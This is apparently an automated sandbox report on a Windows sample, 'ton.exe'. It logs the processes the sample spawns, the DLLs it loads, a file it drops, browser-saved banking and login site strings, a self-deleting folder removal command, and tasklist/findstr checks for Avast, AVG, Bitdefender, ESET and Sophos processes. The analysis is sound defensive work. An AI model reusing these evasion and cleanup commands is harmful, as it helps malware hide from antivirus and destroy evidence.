    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\RQI589ZCBA1V" & exitJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2220,i,9226920140352858911,1917441030376040599,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2508,i,14715817317759310349,9105508345091228975,262144 /prefetch:3Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\RQI589ZCBA1V" & exit
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7028 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7200 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\Desktop\ton.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\ton.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Users\user\Desktop\ton.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: ton.exeStatic file information: File size 1171693 > 1048576
    Source: ton.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: ton.exeStatic PE information: real checksum: 0x11d2b0 should be: 0x11e393

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ton.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exe TID: 4820Thread sleep count: 44 > 30
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\471529Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\471529\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
    Source: Web Data.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
    Source: Web Data.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
    Source: Web Data.21.drBinary or memory string: discord.comVMware20,11696487552f
    Source: Web Data.21.drBinary or memory string: bankofamerica.comVMware20,11696487552x
    Source: Web Data.21.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
    Source: Web Data.21.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
    Source: msedge.exe, 00000013.00000003.3561481303.000027F002590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
    Source: Web Data.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
    Source: Web Data.21.drBinary or memory string: global block list test formVMware20,11696487552
    Source: Web Data.21.drBinary or memory string: tasks.office.comVMware20,11696487552o
    Source: Web Data.21.drBinary or memory string: AMC password management pageVMware20,11696487552
    Source: msedge.exe, 00000013.00000002.3644764799.000002ADB2643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Web Data.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
    Source: Web Data.21.drBinary or memory string: interactivebrokers.comVMware20,11696487552
    Source: Web Data.21.drBinary or memory string: dev.azure.comVMware20,11696487552j
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
    Source: Web Data.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
    Source: Web Data.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
    Source: Web Data.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
    Source: Web Data.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
    Source: Web Data.21.drBinary or memory string: outlook.office365.comVMware20,11696487552t
    Source: Web Data.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
    Source: Web Data.21.drBinary or memory string: outlook.office.comVMware20,11696487552s
    Source: Web Data.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
    Source: Web Data.21.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
    Source: Web Data.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
    Source: Web Data.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
    Source: C:\Users\user\Desktop\ton.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 471529Jump to behavior
